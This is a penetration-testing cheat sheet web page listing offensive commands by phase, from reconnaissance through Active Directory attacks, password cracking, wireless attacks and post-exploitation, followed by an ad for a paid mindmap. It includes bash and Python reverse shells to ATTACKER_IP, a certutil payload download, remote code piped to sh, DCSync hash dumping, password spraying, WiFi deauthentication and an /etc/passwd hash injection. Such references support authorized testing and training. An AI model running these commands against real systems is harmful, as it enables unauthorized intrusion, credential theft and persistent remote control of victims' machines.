# Reconnaissance
Information gathering is the foundation of every pentest. Start with passive recon, then move to active scanning.
Nmap — Network Discovery
nmap -sC -sV -oA scan_results TARGET_IP
Default scripts + version detection with output in all formats
nmap -p- -T4 --min-rate=1000 TARGET_IP
Full TCP port scan — fast mode
nmap -sU --top-ports 200 TARGET_IP
UDP scan on top 200 ports
nmap --script vuln TARGET_IP
Run all vulnerability detection scripts
Subdomain & DNS Enumeration
subfinder -d TARGET_DOMAIN -o subdomains.txt
Passive subdomain enumeration
amass enum -d TARGET_DOMAIN -o amass_results.txt
In-depth subdomain enumeration with OSINT
dig axfr @DNS_SERVER TARGET_DOMAIN
Attempt DNS zone transfer
Directory & File Brute-force
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
Fast recursive directory brute-force with extensions
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Classic directory brute-force with 50 threads
# Web Application Hacking
Test for OWASP Top 10 vulnerabilities: SQLi, XSS, SSRF, IDOR, authentication bypass, and more.
SQL Injection
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
Automatic SQLi detection + database enumeration
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
Enumerate tables in a specific database
sqlmap -r request.txt --level 5 --risk 3 --batch
SQLi from saved Burp request with max level
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
Automated XSS scanner with callback for blind XSS
SSRF & LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
SSRF fuzzing with response matching
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Local File Inclusion fuzzing
Burp Suite Essentials
curl -x http://127.0.0.1:8080 -k https://TARGET
Route traffic through Burp proxy
# Network Services
Common protocols and services you'll encounter during pentests: SMB, FTP, SSH, HTTP, SNMP.
SMB Enumeration
smbclient -L //TARGET_IP -N
List SMB shares anonymously
enum4linux -a TARGET_IP
Full SMB/NetBIOS enumeration
crackmapexec smb TARGET_IP -u '' -p '' --shares
Enumerate shares with null session
FTP
ftp TARGET_IP # Try anonymous:anonymous
Connect with anonymous access
SNMP
snmpwalk -v2c -c public TARGET_IP
Walk SNMP tree with community string "public"
# Linux Privilege Escalation
After getting a shell, escalate to root. Check SUID, capabilities, cron jobs, and kernel exploits.
Enumeration Scripts
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Run LinPEAS for automated privesc enumeration
SUID Binaries
find / -perm -4000 -type f 2>/dev/null
Find all SUID binaries — cross-reference with GTFOBins
Capabilities
getcap -r / 2>/dev/null
List files with Linux capabilities
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Check all scheduled cron jobs
Sudo Misconfigurations
sudo -l
List commands the current user can run as sudo
Writable /etc/passwd
openssl passwd -1 -salt hacker password123
Generate password hash to inject into /etc/passwd if writable
# Windows Privilege Escalation
Escalate from low-priv user to SYSTEM. Token impersonation, service abuse, unquoted paths.
Enumeration
winPEASany.exe quiet fast searchfast
Run WinPEAS for automated Windows privesc enumeration
whoami /priv
Check current privileges — look for SeImpersonate, SeBackup
Token Impersonation
.\GodPotato.exe -cmd "cmd /c whoami"
Exploit SeImpersonatePrivilege (Windows Server 2019+)
Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
Find services with unquoted paths outside system directories
# Active Directory
AD pentesting: enumerate users, kerberoast, AS-REP roast, pass-the-hash, DCSync.
Enumeration
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
Collect BloodHound data remotely
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
LDAP user enumeration
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
Request TGS tickets for offline cracking
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Find accounts without pre-authentication
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
Get shell using NTLM hash (no password needed)
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
Dump all domain NTLM hashes via DCSync
# Password Attacks
Crack hashes, brute-force services, and spray credentials across the network.
Hash Cracking
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
Crack NTLM hashes with rules
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Crack hashes with John the Ripper
Online Brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
SSH brute-force (4 threads to avoid lockout)
Password Spraying
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
SMB password spray across user list
# Post-Exploitation
After getting access: establish persistence, pivot, exfiltrate data.
File Transfer
python3 -m http.server 8080
Quick HTTP server to transfer files
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Download file on Windows target
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Bash reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Python reverse shell
Shell Upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
Upgrade to interactive TTY
Pivoting
chisel server -p 8000 --reverse # On attacker
chisel client ATTACKER_IP:8000 R:socks # On target
Set up SOCKS proxy through compromised host
# Wireless Attacks
WiFi pentesting: capture handshakes, crack WPA2, rogue access points.
airmon-ng start wlan0
Enable monitor mode
airodump-ng wlan0mon
Scan for nearby wireless networks
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
Capture packets from target network
aireplay-ng -0 5 -a BSSID wlan0mon
Deauth attack to capture WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Crack WPA2 handshake offline
# Cloud & Kubernetes
Enumerate cloud assets, exploit misconfigurations in AWS, Azure, GCP, and Kubernetes.
AWS
aws sts get-caller-identity
Check current AWS identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
List public S3 bucket contents
Kubernetes
kubectl get pods --all-namespaces
List all pods across namespaces
kubectl auth can-i --list
Check current permissions
📚 Related Resources
- Pentesting Glossary — 60+ cybersecurity terms defined for ethical hackers
- How to Start Pentesting — Step-by-step beginner's guide with methodology & tools
Want 11,600+ commands in an interactive mindmap?
This cheatsheet shows a fraction of what Pentest Mindmap offers. Get 32 categories, instant search, and one-click copy — organized as a beautiful interactive mindmap.
Start Free 7-Day Trial →